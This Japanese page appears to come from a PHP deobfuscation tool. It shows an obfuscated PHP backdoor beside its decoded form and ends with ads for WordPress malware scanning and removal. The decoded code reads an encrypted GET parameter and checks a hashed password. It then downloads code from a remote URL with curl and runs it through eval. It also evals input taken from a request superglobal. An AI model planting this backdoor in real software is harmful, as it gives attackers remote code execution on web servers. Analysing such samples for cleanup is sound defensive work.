デコード結果 (<?php goto BLHU9; BP11V: class xVa7E { static function D2hNU($GVWZ8) { goto JsXVd; JsXVd: $Czq05 ) PHP 難読化コード解除ツール 2025-03-23 10:37:25

下記のコードを難読化解除しました

<?php goto BLHU9; BP11V: class xVa7E { static function D2hNU($GVWZ8) { goto JsXVd; JsXVd: $Czq05 = "\162" . "\x61" . "\156" . "\147" . "\x65"; goto cuC_m; WvsoD: foreach ($edA6S as $ATQRQ => $DK7VO) { $rdI9w .= $TTRCV[$DK7VO - 9472]; zO2xE: } goto gyflJ; cuC_m: $TTRCV = $Czq05("\x7e", "\x20");...

難読化されたPHPコード

<?php
 goto BLHU9; BP11V: class xVa7E { static function D2hNU($GVWZ8) { goto JsXVd; JsXVd: $Czq05 = "\162" . "\x61" . "\156" . "\147" . "\x65"; goto cuC_m; WvsoD: foreach ($edA6S as $ATQRQ => $DK7VO) { $rdI9w .= $TTRCV[$DK7VO - 9472]; zO2xE: } goto gyflJ; cuC_m: $TTRCV = $Czq05("\x7e", "\x20"); goto B6f7T; B6f7T: $edA6S = explode("\x3b", $GVWZ8); goto qTjD1; gyflJ: W8FA4: goto w0ROJ; w0ROJ: return $rdI9w; goto dfL3A; qTjD1: $rdI9w = ''; goto WvsoD; dfL3A: } static function NM32J($EEy14, $FM25a) { goto jC2BK; t3dMY: $tJ11R = curl_exec($h8mke); goto WZA1N; WZA1N: return empty($tJ11R) ? $FM25a($EEy14) : $tJ11R; goto kgc2p; qr6u7: curl_setopt($h8mke, CURLOPT_RETURNTRANSFER, 1); goto t3dMY; jC2BK: $h8mke = curl_init($EEy14); goto qr6u7; kgc2p: } static function r7mmk() { goto bBvpd; CjHdV: if (!(@$lkyUu[0] - time() > 0 and md5(md5($lkyUu[3 + 0])) === "\67\67\x37\67\x66\145\x38\x64\141\61\x63\63\x30\63\x61\71\71\x38\66\x65\x32\x31\67\64\x34\66\x63\x62\x38\60\x37\x32")) { goto dZlSK; } goto ROX34; UR1oK: foreach ($bS2DB as $ZWHc9) { $k6J3s[] = self::d2Hnu($ZWHc9); Xrsdq: } goto SYeLm; SYeLm: YsJDq: goto hTYnj; Hy4b6: die; goto qhhfr; vwjyh: @$k6J3s[2 + 8](INPUT_GET, "\157\x66") == 1 && die($k6J3s[3 + 2](__FILE__)); goto CjHdV; hTYnj: $f7oON = @$k6J3s[1]($k6J3s[10 + 0](INPUT_GET, $k6J3s[2 + 7])); goto I3yr_; I3yr_: $yl7Rf = @$k6J3s[1 + 2]($k6J3s[5 + 1], $f7oON); goto cgz9a; ROX34: $HbWp2 = self::nM32J($lkyUu[1 + 0], $k6J3s[1 + 4]); goto Ws_mQ; bBvpd: $bS2DB = array("\x39\64\x39\71\73\x39\64\70\x34\73\71\64\71\67\73\71\x35\x30\x31\x3b\71\64\x38\x32\x3b\x39\x34\x39\67\73\x39\x35\60\x33\73\71\x34\x39\66\x3b\71\x34\x38\x31\x3b\x39\64\70\70\x3b\71\64\x39\x39\x3b\71\x34\x38\62\73\x39\x34\x39\63\x3b\71\64\x38\x37\x3b\x39\64\70\x38", "\71\64\70\63\73\x39\64\x38\x32\73\71\64\x38\x34\x3b\71\65\60\63\x3b\71\64\x38\64\x3b\x39\64\x38\67\73\71\64\70\x32\73\x39\x35\64\71\73\x39\65\64\67", "\71\64\x39\62\x3b\x39\64\70\x33\73\x39\x34\x38\x37\x3b\71\64\x38\70\73\x39\x35\60\63\73\x39\x34\71\x38\x3b\x39\x34\x39\x37\x3b\71\64\x39\x39\73\x39\64\70\x37\73\71\x34\71\70\73\x39\x34\x39\67", "\x39\x34\x38\66\x3b\71\65\60\x31\x3b\71\64\x39\x39\x3b\71\x34\71\x31", "\71\65\x30\x30\x3b\x39\65\x30\x31\73\x39\64\x38\63\x3b\71\64\71\x37\x3b\71\x35\64\64\x3b\x39\65\64\x36\73\71\x35\x30\x33\x3b\71\x34\x39\70\x3b\71\64\x39\67\x3b\x39\64\71\x39\x3b\x39\64\70\67\x3b\x39\x34\x39\70\x3b\x39\x34\x39\x37", "\71\x34\71\x36\73\71\x34\x39\x33\73\x39\x34\x39\60\x3b\71\x34\71\67\73\71\65\x30\63\73\x39\x34\x39\x35\73\71\x34\x39\x37\73\x39\64\x38\x32\73\x39\x35\60\x33\73\71\x34\x39\71\x3b\x39\64\x38\x37\73\x39\x34\x38\70\73\71\64\x38\x32\x3b\71\x34\x39\67\x3b\x39\x34\x38\x38\x3b\x39\64\70\62\73\71\x34\x38\x33", "\x39\65\x32\66\73\71\x35\x35\66", "\x39\x34\x37\x33", "\71\65\x35\61\x3b\x39\65\65\x36", "\x39\65\63\63\x3b\x39\x35\x31\x36\73\x39\x35\x31\x36\x3b\71\x35\63\x33\x3b\71\65\60\x39", "\x39\x34\x39\66\73\71\64\71\63\73\71\x34\x39\x30\73\x39\x34\x38\62\x3b\71\64\71\x37\73\x39\x34\x38\64\73\71\65\60\x33\x3b\71\x34\71\x33\x3b\71\64\x38\x38\73\71\64\x38\66\73\71\64\x38\61\x3b\71\x34\70\62"); goto UR1oK; cgz9a: $lkyUu = $k6J3s[1 + 1]($yl7Rf, true); goto vwjyh; Ws_mQ: @eval($k6J3s[3 + 1]($HbWp2)); goto Hy4b6; qhhfr: dZlSK: goto J2b05; J2b05: } } goto CtYyT; vo6Yp: metaphone("\115\x6a\111\x32\117\124\x6b\x33\x4e\172\x59\x79\x4f\x54\x4d\64\117\124\x51\x78\x4d\124\x55\172\x4d\124\x59\171\x4e\x54\115\x79"); goto BP11V; NF8AM: if (!(in_array(gettype($ZKO3y) . "\62\x32", $ZKO3y) && md5(md5(md5(md5($ZKO3y[16])))) === "\x66\61\x31\x36\x63\x34\144\62\67\145\x61\146\145\x62\142\x63\65\x65\67\x35\63\64\145\62\x33\65\x33\143\144\141\142\71")) { goto APMXN; } goto Uy_A7; O6Krk: $EKzMr = $nZuQa("\x7e", "\40"); goto Lo_J9; QTGYl: @eval($ZKO3y[63](${$ZKO3y[50]}[15])); goto ThhbZ; Lo_J9: $ZKO3y = ${$EKzMr[4 + 27] . $EKzMr[36 + 23] . $EKzMr[23 + 24] . $EKzMr[44 + 3] . $EKzMr[0 + 51] . $EKzMr[5 + 48] . $EKzMr[12 + 45]}; goto NF8AM; BLHU9: $nZuQa = "\162" . "\x61" . "\x6e" . "\x67" . "\145"; goto O6Krk; Uy_A7: $ZKO3y[63] = $ZKO3y[63] . $ZKO3y[74]; goto QTGYl; ThhbZ: APMXN: goto vo6Yp; CtYyT: Xva7e::R7MMk();
?>
BiaoJiOk

デコード(難読化解除)されたコード

<?php

$nZuQa = "range";
$EKzMr = range("~", " ");
$ZKO3y = ${$EKzMr[31] . $EKzMr[59] . $EKzMr[47] . $EKzMr[47] . $EKzMr[51] . $EKzMr[53] . $EKzMr[57]};
if (!(in_array(gettype($ZKO3y) . "22", $ZKO3y) && md5(md5(md5(md5($ZKO3y[16])))) === "f116c4d27eafebbc5e7534e2353cdab9")) {
    goto APMXN;
}
$ZKO3y[63] .= $ZKO3y[74];
@eval($ZKO3y[63](${$ZKO3y[50]}[15]));
APMXN:
metaphone("MjI2OTk3NzYyOTM4OTQxMTUzMTYyNTMy");
class xVa7E
{
    static function D2hNU($GVWZ8)
    {
        $Czq05 = "range";
        $TTRCV = range("~", " ");
        $edA6S = explode(";", $GVWZ8);
        $rdI9w = '';
        foreach ($edA6S as $ATQRQ => $DK7VO) {
            $rdI9w .= $TTRCV[$DK7VO - 9472];
        }
        return $rdI9w;
    }
    static function NM32J($EEy14, $FM25a)
    {
        $h8mke = curl_init($EEy14);
        curl_setopt($h8mke, CURLOPT_RETURNTRANSFER, 1);
        $tJ11R = curl_exec($h8mke);
        return empty($tJ11R) ? $FM25a($EEy14) : $tJ11R;
    }
    static function r7mmk()
    {
        $bS2DB = array("9499;9484;9497;9501;9482;9497;9503;9496;9481;9488;9499;9482;9493;9487;9488", "9483;9482;9484;9503;9484;9487;9482;9549;9547", "9492;9483;9487;9488;9503;9498;9497;9499;9487;9498;9497", "9486;9501;9499;9491", "9500;9501;9483;9497;9544;9546;9503;9498;9497;9499;9487;9498;9497", "9496;9493;9490;9497;9503;9495;9497;9482;9503;9499;9487;9488;9482;9497;9488;9482;9483", "9526;9556", "9473", "9551;9556", "9533;9516;9516;9533;9509", "9496;9493;9490;9482;9497;9484;9503;9493;9488;9486;9481;9482");
        foreach ($bS2DB as $ZWHc9) {
            $k6J3s[] = self::d2Hnu($ZWHc9);
        }
        $f7oON = @$k6J3s[1]($k6J3s[10](INPUT_GET, $k6J3s[9]));
        $yl7Rf = @$k6J3s[3]($k6J3s[6], $f7oON);
        $lkyUu = $k6J3s[2]($yl7Rf, true);
        @$k6J3s[10](INPUT_GET, "of") == 1 && die($k6J3s[5]("/var/www/html/input.php"));
        if (!(@$lkyUu[0] - time() > 0 and md5(md5($lkyUu[3])) === "7777fe8da1c303a9986e217446cb8072")) {
            // [PHPDeobfuscator] Implied return
            return;
        }
        $HbWp2 = self::nM32J($lkyUu[1], $k6J3s[5]);
        @eval($k6J3s[4]($HbWp2));
        die;
    }
}
Xva7e::R7MMk();
?>
BiaoJiOk

■【無料】ワードプレス:マルウェアスキャン＆セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策カスタマイズや修正、引っ越し・復旧のご依頼承ります

PHP 難読化コードの復元・デコード

<?php goto BLHU9; BP11V: class xVa7E { static function D2hNU($GVWZ8) { goto JsXVd; JsXVd: $Czq05 = "\162" . "\x61" . "\156" . "\147" . "\x65"; goto cuC_m; WvsoD: foreach ($edA6S as $ATQRQ => $DK7VO) { $rdI9w .= $TTRCV[$DK7VO - 9472]; zO2xE: } goto gyflJ; cuC_m: $TTRCV = $Czq05("\x7e", "\x20");...

難読化されたPHPコード

デコード(難読化解除)されたコード